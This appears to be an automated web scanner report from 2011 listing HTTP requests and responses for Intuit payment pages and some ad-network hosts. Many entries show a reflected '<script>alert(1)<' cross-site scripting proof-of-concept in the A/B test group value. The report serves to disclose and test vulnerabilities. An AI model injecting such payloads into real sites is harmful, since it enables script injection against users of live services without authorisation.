HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:02:36 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95E404B0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 100565 ...[SNIP]... <input id="testGroup" value="T1619d02"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:01:25 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95D2E3B0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 100565 ...[SNIP]... <input id="testGroup" value="T168d5f4"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:03:35 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95F28BD0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 100552 ...[SNIP]... <br /> A/B Test Group: T1662983<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:50 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D961387A0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 145463 ...[SNIP]... <br /> A/B Test Group: T16666da<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:04:10 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=PqWIbcT8 X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95FB2030A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 145475 ...[SNIP]... <input id="testGroup" value="T16d083f"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:03:19 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=5mwmxN X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95EEADD0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 140402 ...[SNIP]... <input id="testGroup" value="T16237a8"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:20 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D960C1040A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 140388 ...[SNIP]... <br /> A/B Test Group: T1672ea0<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:00 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D960766B0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 133369 ...[SNIP]... <br /> A/B Test Group: T16e45dc<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:03:11 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95ECC960A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 133382 ...[SNIP]... <input id="testGroup" value="T1621ddf"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:34 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D960F7BF0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 116178 ...[SNIP]... <br /> A/B Test Group: T1650dd2<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:03:43 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95F49A80A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 116193 ...[SNIP]... <input id="testGroup" value="T16bd521"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:03:03 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95EAE770A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 150366 ...[SNIP]... <input id="testGroup" value="T16be8b6"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:04:55 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D9605F990A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 150350 ...[SNIP]... <br /> A/B Test Group: T16ccada<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:01:45 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95D7A010A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 121588 ...[SNIP]... <input id="testGroup" value="T162cec2"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:03:23 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95EFA180A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 121570 ...[SNIP]... <br /> A/B Test Group: T163073f<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:02:59 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95E9B810A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 127098 ...[SNIP]... <br /> A/B Test Group: T16a853f<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:01:18 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95D10D60A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 127114 ...[SNIP]... <input id="testGroup" value="T16bda72"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:04:34 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D9600E320A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 116390 ...[SNIP]... <br /> A/B Test Group: T1649004<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:02:21 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95E07850A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 116404 ...[SNIP]... <input id="testGroup" value="T16d2219"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /support/ |
GET /support/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:59:02 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95AFFB20A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Vary: Accept-Encoding P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 98215 ...[SNIP]... <input id="testGroup" value="T16c79ad"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /support/ |
GET /support/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:00:41 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID= X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95C80060A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Vary: Accept-Encoding P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 98200 ...[SNIP]... <br /> A/B Test Group: T1677a3a<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /support/glossary.jsp |
GET /support/glossary.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:00:24 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95C3E7D0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 140109 ...[SNIP]... <br /> A/B Test Group: T16b0496<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /support/glossary.jsp |
GET /support/glossary.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:58:46 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95AC1E70A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 140123 ...[SNIP]... <input id="testGroup" value="T16bb67a"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://tag.admeld.com |
Path: | /ad/json/100/glamtoptier |
GET /ad/json/100/glamtoptier Host: tag.admeld.com Proxy-Connection: keep-alive Referer: http://www.highbeam.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: meld_sess=63e2c778-f3e1 |
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://tag Pragma: no-cache Cache-Control: no-store Expires: Mon, 26 Jul 1997 05:00:00 GMT X-AdMeld-Debug: eyB0eXBlOiAgICAgICAg Content-Length: 1157 Content-Type: application/javascript Date: Mon, 21 Mar 2011 16:42:21 GMT Connection: close GlamAdmeldRenderJsAd({"ad ...[SNIP]... <script type=\"text/javascript\" src=\"http://pixel ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www2.glam.com |
Path: | /app/site/affiliate |
GET /app/site/affiliate Host: www2.glam.com Proxy-Connection: keep-alive Referer: http://www.highbeam.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11266129786 |
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Content-Type: application/x-javascript Set-Cookie: bkpix2=1; expires=Mon, 21 Mar 2011 22:15:36 GMT; path=/; domain=.glam.com; X-Powered-By: PHP/5.1.6 P3P: policyref="http://www Vary: Accept-Encoding Cache-Control: max-age=450 Date: Mon, 21 Mar 2011 16:42:16 GMT Connection: close Content-Length: 55384 // <!-- [gnetGeneratedTime]=[Mon Mar 21 2011 9:38:14 PDT] --> // <!-- [gnetCachedTime]=[Mon Mar 21 2011 9:40:13 PDT] --> window.glam_session = new Object(); window.glam_session /* */ window.glam_session.edge = true; window.glam_session.glam window.glam_session.ctags window.glam_session window.glam_session.dma= window.glam_session window.glam_session.sid window.glam_session.user docu ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www2.glam.com |
Path: | /app/site/affiliate |
GET /app/site/affiliate Host: www2.glam.com Proxy-Connection: keep-alive Referer: http://www.highbeam.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11266129786 |
